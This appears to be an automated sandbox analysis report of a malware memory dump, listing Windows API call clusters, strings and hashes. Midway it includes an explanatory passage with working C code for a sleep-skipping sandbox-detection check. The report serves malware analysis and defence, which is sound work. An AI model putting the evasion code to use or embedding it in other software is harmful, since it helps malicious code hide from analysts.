                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: vector<T> too long
                                                                                    • API String ID: 0-3788999226
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 04ECDD93
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,04ECDB8B,?,00000000,?,74E04C30), ref: 04ECDD9F
                                                                                    • WSAResetEvent.WS2_32(?,?,?,?,?,?,?,?,04ECDB8B,?,00000000,?,74E04C30), ref: 04ECDDDA
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                                                    • String ID:
                                                                                    • API String ID: 1862898202-3916222277
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 04ECEF73
                                                                                    • WSAGetLastError.WS2_32(?), ref: 04ECEF7F
                                                                                    • WSAResetEvent.WS2_32(?), ref: 04ECEFBA
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                                                    • String ID:
                                                                                    • API String ID: 1862898202-3916222277
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rUNdLl32.Exe,00000104), ref: 04EE082A
                                                                                    • _free.LIBCMT ref: 04EE08F5
                                                                                    • _free.LIBCMT ref: 04EE08FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Windows\SysWOW64\rUNdLl32.Exe
                                                                                    • API String ID: 2506810119-2716102475
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB53C4
                                                                                    • lstrlenW.KERNEL32(?,?), ref: 04EB52D8
                                                                                      • Part of subcall function 04EB53D0: lstrlenW.KERNEL32(?,00000007), ref: 04EB5402
                                                                                      • Part of subcall function 04EB53D0: wsprintfW.USER32 ref: 04EB542F
                                                                                      • Part of subcall function 04EB53D0: FindFirstFileW.KERNEL32(?,?), ref: 04EB5446
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$FileFindFirstXinvalid_argumentstd::_wsprintf
                                                                                    • String ID: %s%s%s$list<T> too long
                                                                                    • API String ID: 614760719-961022205
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EB7970: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    • CreateEventW.KERNEL32(00000000,00000001), ref: 04EB93B1
                                                                                    • CloseHandle.KERNEL32(04EFD8B0,00000000,00000001,0000003F), ref: 04EB940B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                                                    • String ID: C$J
                                                                                    • API String ID: 1850149996-3934036899
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EBE2D0,?,00000000,00000000), ref: 04EBE506
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID: conf$dbug$init
                                                                                    • API String ID: 2422867632-3701578037
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04EC40C0
                                                                                    • TerminateThread.KERNEL32(?,00000000), ref: 04EC40CB
                                                                                    • TerminateProcess.KERNEL32(?,00000001), ref: 04EC40D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Terminate$MultipleObjectsProcessThreadWait
                                                                                    • String ID: 0et
                                                                                    • API String ID: 2979846252-2725761952
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 04ECAA2B
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04ECAA37
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 2574300362-64178277
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1524
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04ED1546
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED155A
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED1561
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2124651672-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,04EEAAF0,?,00000000,00000001,00000001,?,?,00000001,04EEAAF0,?), ref: 04EEBF77
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04EEC000
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04EDF651,?), ref: 04EEC012
                                                                                    • __freea.LIBCMT ref: 04EEC01B
                                                                                      • Part of subcall function 04EE8193: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,04EE91A3,00000001,00000000,?,04EE13EE,00000001,00000004,00000000,00000001,?,?,04EE0FAC), ref: 04EE81C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 573072132-0
                                                                                    • Opcode ID: 7b33d13cf80ac82b3170eb40e6328863af18dfaabd3204d33f2107d143f181de
                                                                                    • Instruction ID: 59620daf3f00ed8646af69552d2ff6c10d336ead5b6f4be4cd18e00eaa808f4a
                                                                                    • Opcode Fuzzy Hash: 7b33d13cf80ac82b3170eb40e6328863af18dfaabd3204d33f2107d143f181de
                                                                                    • Instruction Fuzzy Hash: C2319C32A0020AAFDB24DF66DC45DBE7BA5EF40354B144128FC19DB290EB35ED51CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 04ECD24C
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000), ref: 04ECD25D
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 04ECD279
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 04ECD2A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: 83d5566a275bda4e06f490160beee29f7eea8c60eb280f6df93adde768674d40
                                                                                    • Instruction ID: db9da0f2ca99fec997875d9e15799c52d9c1276368cd45554d0b0b38ae4b070a
                                                                                    • Opcode Fuzzy Hash: 83d5566a275bda4e06f490160beee29f7eea8c60eb280f6df93adde768674d40
                                                                                    • Instruction Fuzzy Hash: D82144726001057FEB244F44DD44FAABB69EF04B54F208125FD199B280EB72FD208790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC110C
                                                                                    • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EC1147
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EC115A
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EC1178
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCloseCreateFree
                                                                                    • String ID:
                                                                                    • API String ID: 1942913825-0
                                                                                    • Opcode ID: 58453ea5756bfda1aabc3b3d43f7f12158fb4c18960305ee93d8d541d3323bcd
                                                                                    • Instruction ID: d620b36bb4abf7a69dc7d1a1c9be090f1f99aabdb9cba16c5083b74106deb166
                                                                                    • Opcode Fuzzy Hash: 58453ea5756bfda1aabc3b3d43f7f12158fb4c18960305ee93d8d541d3323bcd
                                                                                    • Instruction Fuzzy Hash: 0F2173B5A00208BBEB00DF65CC45FAEBBB8EF44354F10C165F915AB281D675AA05CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,04ED14D9,?,?,?,?), ref: 04ED175C
                                                                                    • WSASetLastError.WS2_32(0000000D), ref: 04ED17EE
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED17F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterErrorLastLeave
                                                                                    • String ID:
                                                                                    • API String ID: 4082018349-0
                                                                                    • Opcode ID: e475be91ca2fa318f895b0f1e5ae571c98ac0fdd701a8aa95b8da1d57a983393
                                                                                    • Instruction ID: 32d8b5b89c455ee190b3aacf8616146b259161082eb84a276eaf22f566f8da77
                                                                                    • Opcode Fuzzy Hash: e475be91ca2fa318f895b0f1e5ae571c98ac0fdd701a8aa95b8da1d57a983393
                                                                                    • Instruction Fuzzy Hash: 7821F8763002059BEB10CF64EC84AAEB7A5FF85329F109525FD16CB256DB32F852CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?), ref: 04EB5964
                                                                                    • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 04EB5979
                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 04EB598C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EB5993
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3604237281-0
                                                                                    • Opcode ID: faec1220f253b8ed550f67e8eaf2d825fdeedada850528835e804087d45487eb
                                                                                    • Instruction ID: 232181edb99bf1e901dc4c9bfa85a8e33c1212d31f76599edf4c1a6a64ce777c
                                                                                    • Opcode Fuzzy Hash: faec1220f253b8ed550f67e8eaf2d825fdeedada850528835e804087d45487eb
                                                                                    • Instruction Fuzzy Hash: 76217371A01209BFEB00DFA4CC45FEEB7B8FF48714F104159E614AB280D775AA45CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 04ED4F80
                                                                                    • InterlockedCompareExchange.KERNEL32(?,?,?), ref: 04ED4F92
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CompareExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 3335655927-0
                                                                                    • Opcode ID: af9e02c6bf04c39d14f3c18592b1ce8e4a1e1beda61459b52eb810ecb91b2a0f
                                                                                    • Instruction ID: b2082a09625d4f4d54d3009fa50fb4c75bd32f60e8c7239977cbc46f1d8e57f5
                                                                                    • Opcode Fuzzy Hash: af9e02c6bf04c39d14f3c18592b1ce8e4a1e1beda61459b52eb810ecb91b2a0f
                                                                                    • Instruction Fuzzy Hash: CF214D72604609AFDB24DF69D980F96F3EDFB59310F40496EEA99C7240DA31F914CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • recv.WS2_32(?,?,?,00000000), ref: 04ECF1A3
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECF1AD
                                                                                    • GetLastError.KERNEL32 ref: 04ECF1C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$recv
                                                                                    • String ID:
                                                                                    • API String ID: 316788870-0
                                                                                    • Opcode ID: e20bf23ffc8bcc146353b7e447b8fe79fa8f28d743900d584a2427cee61127c5
                                                                                    • Instruction ID: 81c11f2422856e09e669aee69efcef967178c8f209b10f92e1bcb6f7596ca7ba
                                                                                    • Opcode Fuzzy Hash: e20bf23ffc8bcc146353b7e447b8fe79fa8f28d743900d584a2427cee61127c5
                                                                                    • Instruction Fuzzy Hash: B6119B722017009FD7308F5DD548797B7F6EB84329F104A2EE556C66D0CBB9F48A9B50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE73E
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE750
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE7BD
                                                                                    • SetEvent.KERNEL32(?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE7D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                    • String ID:
                                                                                    • API String ID: 3394196147-0
                                                                                    • Opcode ID: b4dffa4e7e52580628aa466365c3c7edc691b099fc67d3f72eb0b7714f3df471
                                                                                    • Instruction ID: def1c61436d20263279f826d91a76da8508d34ce4cb61adf3ee9855fb172a13a
                                                                                    • Opcode Fuzzy Hash: b4dffa4e7e52580628aa466365c3c7edc691b099fc67d3f72eb0b7714f3df471
                                                                                    • Instruction Fuzzy Hash: 83111971201605AFD708CF29D988BE6FBA8FF59315F01822EE5198B241DB36E912CBD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,04EE8C45,?,00000001,00000000,?,?,04EE910D,00000008,GetCurrentPackageId), ref: 04EE8CD0
                                                                                    • GetLastError.KERNEL32(?,04EE8C45,?,00000001,00000000,?,?,04EE910D,00000008,GetCurrentPackageId,04EF91F0,GetCurrentPackageId,00000000), ref: 04EE8CDC
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,04EE8C45,?,00000001,00000000,?,?,04EE910D,00000008,GetCurrentPackageId,04EF91F0,GetCurrentPackageId,00000000), ref: 04EE8CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 031635c9ab97bd4a73e4b8f41b4433a2c91debe011edc0c60cfafc1df5ab3e57
                                                                                    • Instruction ID: 8b420776ed60232324bfa66c951c3d6329f8b3ee4df7a32a06a6129e53d6eb38
                                                                                    • Opcode Fuzzy Hash: 031635c9ab97bd4a73e4b8f41b4433a2c91debe011edc0c60cfafc1df5ab3e57
                                                                                    • Instruction Fuzzy Hash: 8E012032712223ABD7319E6BAC44A77379DFF957A57101620FD06D3140E725EC04C6E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,74B5F690,74B5F660,?,?,04ECA746), ref: 04ECA05C
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,04ECA746), ref: 04ECA06D
                                                                                    • WriteFile.KERNEL32(00000000,04F03D18,00001600,04ECA746,00000000,?,04ECA746), ref: 04ECA08B
                                                                                    • CloseHandle.KERNEL32(00000000,?,04ECA746), ref: 04ECA09C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3604237281-0
                                                                                    • Opcode ID: 80348fed174b4c6921a0b36965c92096ed2cb31c78972be28ada5c546b5d5f64
                                                                                    • Instruction ID: ffe50cf4fbd195eb72ce99430f144081db72d905751ecb2f7474ee18ba512a93
                                                                                    • Opcode Fuzzy Hash: 80348fed174b4c6921a0b36965c92096ed2cb31c78972be28ada5c546b5d5f64
                                                                                    • Instruction Fuzzy Hash: 2BF06871743128B7D2309A569C0DFBB7EACDFC6BB2F104269BD19D2184D9659C0292F0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 04EF1EC0
                                                                                      • Part of subcall function 04EF24F8: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 04EF2527
                                                                                      • Part of subcall function 04EF24F8: ___AdjustPointer.LIBCMT ref: 04EF2542
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 04EF1ED7
                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 04EF1EE9
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 04EF1F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 2901542994-0
                                                                                    • Opcode ID: 7da64e4c7d7c3d2aad183759c56d200d60dd74d6309963a0bc7348b47929d19c
                                                                                    • Instruction ID: 0740ce77b06f2314ee0a5073497aec729b96e536937519d8a335555d126d6890
                                                                                    • Opcode Fuzzy Hash: 7da64e4c7d7c3d2aad183759c56d200d60dd74d6309963a0bc7348b47929d19c
                                                                                    • Instruction Fuzzy Hash: 5801253240010CFBDF129F55CC00EEABBBAEF48718F05A114FA1866120D732F861EBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 04ED15CC
                                                                                    • InterlockedIncrement.KERNEL32(04F06B70), ref: 04ED15E2
                                                                                    • InterlockedIncrement.KERNEL32(04F06B70), ref: 04ED15ED
                                                                                    • timeGetTime.WINMM ref: 04ED1605
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: IncrementInterlockedTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 159728177-0
                                                                                    • Opcode ID: 5811d8b3562114a5215328ca9662abf016d3857e4b6811664028008a14842fc9
                                                                                    • Instruction ID: a8f19660bd540e8f7b09073a4413aea435864f7dcbdb253536fde5ad952865a1
                                                                                    • Opcode Fuzzy Hash: 5811d8b3562114a5215328ca9662abf016d3857e4b6811664028008a14842fc9
                                                                                    • Instruction Fuzzy Hash: 45014CB5A00215AFD700EF6AD404649BBF8FF88315F04411AE409C3640DBB4B861CFD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

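The timeGetTime record just above and the GetTickCount / Sleep(000003E8) / GetTickCount record that follows it are the shape of a sleep-skipping check: read a millisecond tick source, sleep, read it again, and compare the delta with the interval that was requested. A sandbox that hooks Sleep to return at once, or fast-forwards the clock without keeping the tick source consistent, shows a delta far below the 1000 ms the sample asks for. The following is an added example written for this page, not code recovered from the sample or produced by the report; the function names, the 50 ms jitter tolerance and the CLOCK_MONOTONIC fallback used to run it off Windows are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <time.h>
#endif

/* Millisecond tick read. On Windows this is the GetTickCount call seen in the record;
 * elsewhere CLOCK_MONOTONIC stands in (assumed substitute) so the logic runs on any host. */
static uint32_t tick_ms(void)
{
#ifdef _WIN32
    return GetTickCount();
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint32_t)((uint64_t)ts.tv_sec * 1000u + (uint64_t)ts.tv_nsec / 1000000u);
#endif
}

/* Sleep wrapper: Sleep() on Windows (the record's Sleep(000003E8)), nanosleep elsewhere. */
static void sleep_ms(uint32_t ms)
{
#ifdef _WIN32
    Sleep(ms);
#else
    struct timespec ts = { (time_t)(ms / 1000u), (long)(ms % 1000u) * 1000000L };
    nanosleep(&ts, NULL);
#endif
}

/* Decision step, kept pure so it can be exercised with chosen tick values.
 * Returns true when the tick delta measured around Sleep(requested_ms) fell short of the
 * request by more than slack_ms. slack_ms absorbs GetTickCount's 10-16 ms resolution and
 * scheduler jitter; a hooked Sleep that returns immediately is far outside that band.
 * The unsigned subtraction also handles GetTickCount's 32-bit rollover every 49.7 days. */
bool sleep_was_shortened(uint32_t before, uint32_t after, uint32_t requested_ms, uint32_t slack_ms)
{
    uint32_t elapsed = after - before;   /* wraps correctly across the rollover */
    if (elapsed >= requested_ms)
        return false;                    /* slept at least as long as asked */
    return requested_ms - elapsed > slack_ms;
}

/* The sequence the record shows: tick, Sleep, tick, compare. */
bool probe_sleep_skipping(uint32_t requested_ms)
{
    uint32_t before = tick_ms();
    sleep_ms(requested_ms);
    uint32_t after = tick_ms();
    return sleep_was_shortened(before, after, requested_ms, 50u);   /* 50 ms tolerance is an assumption */
}

int main(void)
{
    /* Same parameter as the record: 0x3E8 = 1000 ms. */
    bool shortened = probe_sleep_skipping(1000u);
    printf("Sleep(1000) shortened: %s\n", shortened ? "yes (hooked sleep suspected)" : "no");
    return 0;
}
```

For an analyst building or tuning a sandbox, the takeaway is the inverse of the check: whichever source the sample reads (GetTickCount, timeGetTime, QueryPerformanceCounter, RDTSC) must advance by the same amount that the accelerated Sleep pretends to have waited, or the delta gives the acceleration away.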
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 04EBA351
                                                                                    • WaitForSingleObject.KERNEL32(04ECB34C,000000FF), ref: 04EBA37A
                                                                                    • CloseHandle.KERNEL32(04ECB34C), ref: 04EBA383
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EBA38F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateEventObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3071945061-0
                                                                                    • Opcode ID: 6b6a4a712a00dd3aa06d6d9aab4a3f50b4a562ecbe82bbfa91389e4327129c75
                                                                                    • Instruction ID: 741b690302e1ddbbc3abd78ed3e27407aeb79bc65086d88f2e374cb8090a54f9
                                                                                    • Opcode Fuzzy Hash: 6b6a4a712a00dd3aa06d6d9aab4a3f50b4a562ecbe82bbfa91389e4327129c75
                                                                                    • Instruction Fuzzy Hash: FDF09671941314BBEB10AB949C0EBFE7A75DB01715F200254FA24791C5DBB529108BC5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteDesktopHandleRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3596899788-0
